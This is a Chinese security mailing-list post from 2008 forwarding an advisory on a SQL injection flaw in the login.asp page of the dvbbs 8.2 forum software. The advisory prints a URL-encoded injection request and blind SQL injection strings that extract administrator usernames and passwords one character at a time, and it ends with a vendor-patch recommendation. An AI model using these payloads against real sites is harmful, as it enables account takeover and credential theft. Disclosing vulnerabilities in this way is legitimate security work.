听说是实习生写的代码。

2008/5/30, 大风 <[EMAIL PROTECTED]>:
>
>
> *From*: 
> <hackerb_at_hotmail.com<hackerb_at_hotmail.com?Subject=Re:%20dvbbs8.2%28access/sql%29version%20login.asp%20remote%20sql%20injection>>
>
> *Date*: 29 May 2008 10:19:00 -0000
>
> ('binary' encoding is not supported, stored as-is) name:
> where (topsec security research group)
>
> email:
> hackerb_at_hotmail.com
>
> Subject:
> dvbbs8.2(access/sql)version login.asp remote sql injection
>
> danger level:
> critical/High
>
> info:
> dvbbs is prone to multiple sql injection security flaw
>
> interrelated code to access version(exp):
> password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
>
>
> Examples(access version):
> decide
> Where� and �1�=�1
> where� and �1�=�2
> to get usernamer or password
> where' and 1=(select count(*) from dv_admin where left(username,1)='a') and
> '1'='1
> where' and 1=(select count(*) from dv_admin where left(username,2)='ad')
> and '1'='1
> .......................
> .......................
> where' and 1=(select count(*) from dv_admin where left(password,1)='1') and
> '1'='1
> where' and 1=(select count(*) from dv_admin where left(password,2)='15')
> and '1'='1
> ......................
> ......................
>
> Solution:
> Authorities patch
> dvbbs web site(http://www.dvbbs.net)
>
> References:
> dvbbs(http://www.dvbbs.net)
> *Received on* May 29 2008
>
>
>
>
>
> *[Ph4nt0m] <http://www.ph4nt0m.org/> *
>
> *[Ph4nt0m Security Team]*
>
>                *   [EMAIL PROTECTED] <http://blog.ph4nt0m.org/>*
>
> *          Email:  [EMAIL PROTECTED]
>
> *          PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
> *
>
> *          **=== V3ry G00d, V3ry Str0ng ===***
>
> *          === Ultim4te H4cking ===*
>
> *          === XPLOITZ ! ===*
>
> *          === #_# ===*
>
> *#If you brave,there is nothing you cannot achieve.#*
>
>
>
>
>
> >
>
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

<<inline: image001.gif>>

回复